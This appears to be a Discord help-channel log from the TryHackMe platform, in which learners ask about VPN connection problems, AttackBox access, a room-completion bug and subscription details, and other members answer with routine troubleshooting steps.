You also agree:
Not to reproduce, duplicate, copy or re-sell any part of our site in contravention of the provisions of our terms of use.
yes but it says in contravention of the provisions of our terms of use
is this in contravention of the provisions of their terms of use?
I will make sure by asking them directly by an email
you can just make that repo private
I would but I wanted to share knowledge and also to show it as a progress proof in cv
but I will make sure it is ethical and legal
if not I will find another way
and thank you @torpid patio
Gave +1 Rep to @torpid patio (current: #1962 - 1)
stuck in the room Vulnerabilities 101 task 4 "
Using NVD, how many CVEs were published in July 2021?"
the answer is 1585 but isnt check with the green mark ๐ฆ
Are you sure it's 1585? ๐
i found the result in youtube and medium ๐ฆ
try looking on the nist site
i try, no clue what the answers lol, only this task for Certification Jr Pen Test
Link the room please.
go to the nist search tab, for adding filtres you should set search type to advanced and set Published Date Range for july 1nd 2021 to july 31 2021
This answer is wrong. ๐
lol
https://www.youtube.com/watch?v=tt3vFjVrP80 this video is giving me the wrong answer ๐
Feels good bro
tks for the help
np bro ๐
Are there plans to have both business and personal email address in your profile?
This is the one (and probably only) thing that really, really bugs me about THM.
In order to participate in my companies "leaderboards" I had to change my account email address to my business email address. Also I receive all communication about payments, streak alerts etc. on my business email then, which I don't want. Please, please add an option to verify business email next to having a personal main account one. I hope this channel is right for feedback like this. Thank you.
I didn't even realize it had a business account setup but I already made the account using details that would cause identity cross-contamination for me that I don't want lmao
Whoops
#feedback-and-ideas ๐
thanks
Gave +1 Rep to @bronze vale (current: #6 - 1110)
Correct
Hello, need some direction to this error.
Thank you
ssh: connect to host 10.10.224.147 port 22: No route to host
What room is this? It may not have ssh running or you may not be able to talk to the VM properly
or maybe you forgot to have the vpn turned on on your attacking vm
Hey guys, when you have a paid sub with the faster room, do those faster rooms apply if you are using VPN in lieu of the attack box?
Thanks
Pretty sure it does
Subs do get victim VMs that are faster iirc, they also get access to sub only VPNs which can be faster due to less traffic as well
thanks for the responses @languid pier @gleaming flume
Gave +1 Rep to @languid pier (current: #978 - 3)

Any word on when support will be back online? I'm waiting for my premium subscription to be activated...they sure were quick to take the money..
THM Support standard response time is at ~8 to 9 working days at the moment following the conclusion of the AoC event. Also, don't send any follow ups during the said time frame as you'll push your ticket down the queue.
Need command to shut down OpenVPN, I was connected to OpenVPN when i had to force a shutdown on my vm.. this lead to my OpenVPN terminal tab to not exist anymore but it thinks I'm still connected? The problem here is that I'm not actually proof being in screenshots above.
killall openvpn
ive tried to locate the process it doesnt exist
Even as root you can't see it?
root being the command along with sudo?
yeah im only getting back the grep process
wait
well now it says im not connected however still giving me errors whilst trying to connect
nvm
just ran as sudo
we chilllinnnnnn
Very nice
yeah thanks
Gave +1 Rep to @gleaming flume (current: #50 - 135)
first time writing in chat so hopefully this is the correct channel
I get this
but also this lol
refreshing doesn't work
same here
Can you post this in the #site-bugs channel please?
If you log out and view the room, can you see an extra question?
task or question
Question..
, I did logout but all the ticks for all the tasks are still there , so I opened all tasks , just in case it didn't render yet or something but all of them are still answered
shall I reset progress ?
I reset the whole progress and did it again , and it still stopped at 98%
I have the same problem
Maybe they are working on that room
And it will me updated with more questions, idk
probably , yah but thats one more question lol not a lot
i have the same issue, its like im 98% done but all questions answered
Apparently a lot of people are having the same issue
What room is it?
If itโs nmap I think the room itself is glitched because 2 other people have the same issue.
whats up, did you get ur ticket reviewed?
OpenVPN access. Hi need help. i'm used to able to connect via OpenVPN but it seem like is broken. I have re-generated the VPN file but still having problem. pls advise.
How is it broken? Is the file empty? Can you send a screenshot of when you are trying to connect?
Are you connecting your VM via Linux?
upvote it in room-bugs , cos 4 ppl said the same thing till now
Hello, by completing some paths or finishing all the levels, can you get some sort of certificate ?
Of participating yeah.
Chill, staff will get to it.
So nothing serious lol ?
Not too serious, as THM can#t really prove you done all the content.
Okay I understand
Please post in #room-bugs
Soooo they finally got back to me and said my payment wasn't received before my subscription ended. So instead of applying the sub they just refunded the money.
Hii,
How to allow attackbox to read clipboard in firefox?
I was using brave for a long time and when I start an attackbox on brave, I got a pop up asking permission to read clipboard but not in firefox.
For everyone having issues with the % complete on the Nmap room, I'm pretty sure I know the root cause and hopefully there is a clean way to "fix the fix". I've replied in #room-bugs as well.
There should be a dock (showing ghree dots) on the lefthand side of the screen.
does "all learning paths" not include aws path?
No, that's a separate purchase.
Hi, How can I use alt + tab for the windows on the attackbox ?
I think that setting needs to be enabled in Ubuntu? Not sure to be honest.Try opening the attackbox view in fullscreen and the keyboard shortcut might parse through
Thank you, I'll check the settings
With the king of the hill game mode are u able to use the attack box
Or does it have to be done through openvpn
where should i ask for a new discord token? mine is registered to an old discord account and requested discord for deleting it, but forgot the token for thm hehe
no can't find How can I use alt + tab for the windows on the attackbox in ubuntu settings, nor can I use it in full screen
You can ask a mod to remove the token from your old account.
You can use the attackbox
Since its browser based I don't think you'll be able to alt + tab. I haven't tried but if you can expose the VNC ports then you should be able to VPN in (attack box afaik doesn't let you forward ports publicly might be wrong on this) and connect to VNC directly with a VNC client which should allow you to use shortcuts that the web browser might not be able to intercept.
Thank u sir, will try that
Gave +1 Rep to @burnt gale (current: #594 - 6)
Actually ignore everything I said
Looks like when you're a subscriber THM attackbox forwards all ports publicly. So you can just get the password from the VNC url and check the public IP address of your attack box and VNC in using publicip:5091 password is also listed in the URL
You can even use windows RDP or any other RDP client with port 3389 since xfree RDP
So smart, thank you
Gave +1 Rep to @burnt gale (current: #541 - 7)
SSH and everything is publicly accessible noice. The only thing I see missing are a init script and like a user store location that's backed up and copied over on every boot.
Maybe also displaying the attackbox details on the /access page would also be nice
So I completed the Nmap room a while ago but when I was looking back it doesn't show the check mark even though its a 100% complete. will this affecte the certificate?
Supposedly if your on a VM do -Pn
I think you misunderstood me, what I meant was that I completed the Nmap room on TryHackMe but on the dashboard it shows as incomplete even though the room as 100% completed
I'm sorry, but I don't get it and I can't share images on this channel for some reason
You'll need to verify your account to do so.
Machine remains persistent after terminating multiple times, if I refresh, the timer just continues
Now I can't move on to the next room because I can't have 3 machines up at the same time
.then(r => r.json())
.then(vms =>
vms.forEach(vm =>
fetch('/api/vm/terminate', {
method: 'POST',
body: JSON.stringify({ code: vm.roomId }),
headers: {
'csrf-token': csrfToken,
'Content-Type': 'application/json'
}
})
)
)
Run this in your browser console.
Thanks scrubz
Gave +1 Rep to @weary spindle (current: #2 - 1829)
I've used this so many times lmao, absolutely lifesaving
I only suggest it to subscribers.
What causes the issue though?
Luckily I fall under that category, though I did originally find it in a reddit post
Also I've become much better about making sure to terminate everything before hitting proceed to the next room
For me it was always failing to close the success window and properly terminate everything before moving on
I have the same issue
It will be fixed soon, no worries.
Hello, I have a question
When I tried to subscribe to a premium account, I got this message: Whoops! Looks like the service youโre trying to access isnโt available in your region.
I'm from Syria, If I asked my cousin who lives in Germany to subscribe for me on my account, would I be able to use the premium features without any problems in my region?
you'll need to ask a mod for the room creation role.
So I started a machine, but when I try to ping it, I just get 100% packet loss.
Which machine?
Are you on the attackbox, or a vm?
Then we cannot help for two reasons,
We don't have access to the room.
We don't help with work related queries. (outside or inside of THM)
however, Are you on the VPN?
Ah I see, yeah I'm on the VPN
Can you confirm your connection with
ip a | grep "tun"
and curl 10.0.10.10/whoami
This was the responses:
โโ# curl 10.0.10.10/whoami
curl: (7) Failed to connect to 10.0.10.10 port 80 after 21031 ms: Couldn't connect to server
โโ# ip a | grep "tun"
10: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
inet 10.8.252.116/16 scope global tun0
Interesting...
Can you visit http://10.10.10.10/ in your web browser?
Whatโs your Vmโs OS
Yeah visiting that URL works. I'm using VMware workstation pro with Kali Linux
Well, You're connected, that's all the help I can give you.
Can you verify your discord account then send a screenshot of your OpenVPN output
@exotic forge
Which VPN server are you using?
Move to EU-2, make sure not to background the VPN process or close it while using TryHackMe ๐
Still nothing
I'm sorry, you'll need to contact your supervisor, as it's work related, I've helped you as much as I am allowed to.
I understand, I appreciate your help.
I agree about the Nmap room. I've completed all the modules, but the room won't close out.
Staff are aware, and the creator, it will be fixed soon.
Thank you.
Gave +1 Rep to @weary spindle (current: #2 - 1830)
Is there a way to put a notice on the room about the issue? Might prevent some further instances of the question here
Thay would be down to Muiri or staff.
I'd say a pin here might help too... but no one reads pins before posting lmao
And that would be a mod for that job, haha!
Some members do.
Yeah, ideally every question is preceded by looking at pins and doing some searching but... ideally
Staff are aware.
Hey:) we're looking into it. Seems to be a bit of a complicated issue but we're working on it ๐ ๏ธ
W Ben
hey folks, i can't seem to sign into my account, I'm signed in on my desktop, but on my laptop with the same creds (i have a password manager to confirm) it tells me incorect username/pw. Interestingly trying to reset my pw from my laptop doesn't sent an email either [edit - fixed, it doesn't like my username but my email worked]
hey, i was wondering, does anyone know if it's possible to export our statistics data ( yearly activity / streaks / badges / questions answered / rooms completed / hours ) if not with the profile badge id ?
( sorry if wrong channel )
I'm not sure if an education or business account has this capability, but let's wait for people who are aware to chime in. For now, I would post it in #feedback-and-ideas
the nmap room still hasn't been fixed? Should I report a bug?
The staff said they are working on it. They said it will take a bit.
oki doki thank youuu
Why do some of the rooms, like the lateral movement and breaching AD in the pentest+ path say that there is only 1 - 2 days of access left?
this is just a timer for how long you're allocated to that specific network. It's for capacity reasons. I.e. no point having networks sitting around running if no one's using them ๐
After the count, you'll be assigned a new network, assuming you still meet the requirements to join it (I.e. a subscription or a 7 day streak as a free user)
Thank you!!! I was getting nervous. There is no way I could finish all those rooms within that time. I was afraid they were going to just disappear or something.
Gave +1 Rep to @zealous yoke (current: #8 - 775)
Ah nah. They won't disappear ๐ I believe it's going to be explained clearer in the upcoming site changes ๐
OK. Thanks again!
no problem!
having a strange issue wiith the NMAP room in the Complete Beginner learning path. I've completed it a few days ago and had a alarge green check for the whole room. I log in today, and the check is gone. I double checked the room itself to make sure i've answered all the questions, and i have. It has 100% completion for the status. I reset the room and re-enetered the answers, and i'm still getting the same issue
The staff members know about it and are trying to find a fix. Iโm sure they will send out a update once itโs fixed
perfect! thank you!
Gave +1 Rep to @languid pier (current: #676 - 5)

lost my streak once again was at 43 missed to answer question yesterday 11th of Jan, and now back to 1 instead of 30.
Hi, I've completed all rooms in the Complete Beginner learning path but there seems to be a bug with the NMAP room.
I've completed all tasks on the room itself, which looks like it is completed (as shown in 2nd image).
However, on the page for the learning path it says there is one unanswered question even though the top right says the path progress is 100%.
Side note: I am able to retrieve the certificate.
Also on the page with all learning paths it shows like this as well.
THM Staff is aware of the issue and is already looking into it.
same issue
hello, I am having trouble downloading the Wreath's Room VPN.
Does anyone know a solution?
What's the issue?
I cannot download the VPN.
The download never ends.
bad english sorry...
Ah, you'll just need to wait I'm afraid.
Does that mean there is a problem?
Hello ๐ can you check the learning path page to see if it says it is now complete please? If so, can you try and generate the certificate please?
cc @patent escarp @lucid crown @short mortar @carmine grove
Thanks for checking. Just to double-check, it's this that is not showing as 100% or is it the module itself? (ignore my 21%)
Gave +1 Rep to @short mortar (current: #1964 - 1)
I canโt complete your room ๐ญ, im not a subscriber
@zealous yoke screenshots are from my phone, so itโs a bit wonky. Nmap room itself still shows 100%, but itโs not overall completed.
Ah the screenshots are super helpful. We're aware about the module part not reflecting correctly now but seems like there's other things.
Brill, I'll forward these on now ๐ ty as well Uncle
Did it change when Muiri changed the room?
Uhhhh it's complicated xD
Lmao.
So it's not like the other times?
It is but also isn't. Same symptom but there's a few things that can cause it ๐
Ah, so it's one of those, it's the Monday of problems.
Cool cool appreciate the info. If you've already generated the certificate, you'll be able to download it again as it's already been generated. The issue is with people who haven't generated the certificate before the bug occured
blood sweat and tears? ๐ hehe. For real though yeah a lotta work but I'd recommend giving it a try some time. Scrubz linked a helpful article:)
Thanks
Not too sure if anyone in here can help but when trying to connect on some of the training, when I click a link for a website, it says that THM is taking too long to connect. Can anyone help me get around this?
So, you're in your terminal and CDed to Desktop?
yes
What errors?
il try not to dox myself
You can take a screenshot then redact any information of yours
Are you on VPN on your host? LIke Proton and such?
i was using my vpn before
but i disconnected
and restarted
shit
had my ip
god damn
anyway
I didn't see it, I was in General, so no worries here
okk
So this is on a VM, correct?
yes
Have you restarted your VM since you disconnected your VPN on your host?
yes
What about EU Reg 1?
il try that
that did sometjing different
im connected
finnally
all i had to do was change the servers
thanks a lot
now what do i do?
Hi, it is now complete on every place and I can successfully generate the certificate.
I noticed in another message you sent a bit later that the bug is believed to happen for people that had not generated a certificate before the bug. This is interesting because I had generated my certificate prior to this. ( on the 26th of September 2023)
to use it
You're very welcome!
Once connected, you now have access to work off your VM for rooms. So lets take a room with just an IP, no box opens in the other window.
You can now access that IP's web interface if it has those ports. You can also NMAP it, and do everything you would on the attack box, but on your VM
ok, perfect
I personally love working off my VM for rooms, that way I have more control of my environment
hi, i don't know if it's the right channel to ask for that but i wanted to ask a question about the prenium of THM, it's 14$/month and 20% off for students but how can i proove i'm a student ? The occupation details in my profile settings ? Also, is it per month or if you choose the annually plan ?
You can change your E-mail to you acedemic E-mail.
and it's either.
so if put my academic E-mail in the settings, this would be possible for me ?
It should be, if the rare case it doesn't, you can E-mail support.
alright, thanks for the help ! Have a good day
@zealous yoke it now shows complete.
What about that whole malware fresco
Did you figure out the problem
yeah just avast being weird
Maybe thatโs a sign
wdym?
Sign to change antiviruses
well i changed
Yโall fixed the bug! NMAP shows complete again. Thanks yall!
Hi, I think the vpn cerfiticate for EU-Regular-3 is broken , i got error=self-signed, but on EU-Regular-1 it is working
Haven't received points from my past 3 rooms. Neither does it count the questions. Rooms are complete however.
Awsome
Which ones
And can you provide a screenshot of them
OSI Model, Packets and Frames, Extending Your network
the rooms show as completed, but the questions arent counted in my dashboard.
nor did i get any points
So the questions donโt work?
they arent counted in my dashboard.
as far as i can see none of the questions i attempt right now are getting counted in my dashboard
Ima be straight up. I have no idea ๐ญ
You get the points in personal knowledge ๐
what's the point of points
Points are like a achievement
good ty
i mean is it common for there to be a delay in the question count/points updating
Might just have to reset once your done
wym
Gave 1 Rep to aces1735 (current: #595 - 6)
oh i surely didnt try refreshing the page

. leaving this here
is the attack box system broken
mine keeps looping in errors
The requested connection does not exist. Please check the connection name and try again.
Pls can someone help me with this?
Are you sure its a gpg?
works for shadow
@worldly shell continuing it here
Is Nigeria blocking UDP connections? Have you been able to successfully connect before?
Okay.
No. I am new to TryHackMe.
I doubt if the UDP connection is blocked.
OK, how do you have things setup? Are you using a VM? What Operating System?
Windows.
OK, so I would recommend that you download VirtualBox and setup a Kali Linux VM.
You're not going to have a lot of the tools you'll need on windows.
Thank you.
Does this connote that I have a VM?
Gave +1 Rep to @woeful hedge (current: #18 - 374)
Yes
anyone know how fix "the connection has timed out" in mozilla ?
Re-install the internet ๐
Are you connected with TryHackMe VPN? Perhaps try to restart it?
i get the same thing
using the attackbot
box
Are you on the attackbox or VM?
attackbox
Are you a subscriber?
no im new
Then you won't have an external network
Yes theyโre privacy, yes theyโre breaking the law, safety is subjective
Ok, thank you
Gave +1 Rep to @bronze vale (current: #6 - 1113)
It's not breaking any terms to rsync the wordlist files from an attackbox to my own machine is it
Is the wordlist THM specific? It probably makes sense to just pull the list from github.
Or wherever it's repo is
I don't know what the repo is but I suppose I could do some digging
Common wordlists like rockyou mostly do the job
does THM has regional pricing?
Not currently
hey, i think there is an issue with my thm dashboard, its written that i anwsered 0 questions even if i've done some challenges today ( and that today's streak is marked as completed ) , also for the number of hours studied this week, its not accurate and ive been facing this issue a few times this week, can someone help ?
I've tried using both Windows and Linux. I have attached the logs and the output from the openvpn command.
the linux one looks correct to me
did you check the connection in the thm settings?
where in thm settings?
hold on
hm
usually i should get an ip. but it dont seem so. Seem like the VPN tunnel is not establish
interesting why itsn ot connecting for you
i might be the vpn server.
because there was another guy on here
or is my account blacklisted? ๐
who was having trouble and turned out it was the european server
who would i know actully
it was working few weeks before though
ok.. when i switch to US VPN Server is ok.
i'm good for now since i can use the US VPN Server.
Alright
Great
When ever I see another staff member Iโll tell em
This page can be bugged
When trying to go through one of the learning paths, all I get is an error. Iโve no idea on how to get around this. Can anyone help?
I canโt add an image but it says 10.10.73.233 took too long to respond
You'll have to verify your account to do so.
You're not on the VPN.
This is the error I'm getting. I'm not sure how I can get around this
Are you using the Attackbox or your VM that is connected to THM OpenVPN?
The attackbox
Is 10.10.73.233 the Attackbox IP?
It is yea
You are supposed to click on the green Start Machine button in the first few tasks of the room you are working on. It will give you the IP that you need.
I've done that
What IP did it give you? If you are using the Attackbox, you should have 2 different IPs. One for the target and one for the Attackbox.
10.10.3.117 is the other one I can see
This should be your target and not the Attackbox IP.
Can it change or will it always be the same?
I now see 10.10.23.38 with /robots.txt after it
It will be different each time although there should be a pool or range of IP addresses where it is pulled from or it can be assigned with DHCP. Not really familiar with THM's network so I'm simply guessing.
Yea it's changed a few times now but I can't seem to connect to it for some reason
Linux boxes usually require 2 to 3 minutes for it, including the services, to fully spin up while Windows boxes requre at least 5 minutes. Even if you already have the IP, the service you are supposed to attack might not have started yet.
There are also rooms that may take more time to do so.
I'm giving up at this point. It just won't load for me
I thought you mentioned you were able to access the robots.txt?
No it's that point that isn't loading for some reason
screenshot the room + attackbox
What room are you working on? Have you enumerated the box to know what services are running on it and whar directories does it have?
Jr Penetration Tester and if I'm honest, I don't know
In your attackbox browser, have you tried to access - http://10.10.23.38/robots.txt
Did you use your host browser when you said it doesn't load?
I have yes and I get this
I've been doing it all wrong this time. Apologies ๐คฆโโ๏ธ
No worries, we all need to start somewhere.
Working to use #autopsy room. Paid for premium and still says โremote serverโ not connecting
Target VMs don't usually require an internet connection to solve it. Or are you referring to the Attackbox?
Im stuck on the same thing.
Task 3 Practical Example of defesive security (Q What is the flag that you obtained by following along? So the IP address is from china the answer isnt china i dont quit understand
Did you keep going through the whole process? There are six steps/slides in that split view window that you must complete and then the flag will be given to you
Keep following the steps and clicking the "next" button
why i cant access rooms like rpwebscanning, toolsrus, linuxctf or rpnmap
they appear private to me
They might be sub only rooms, are you a subscriber?
yes, i am
Hmm, not sure then. Could you send a screenshot of what you see when you try to enter the rooms?
You have to verify to send images here
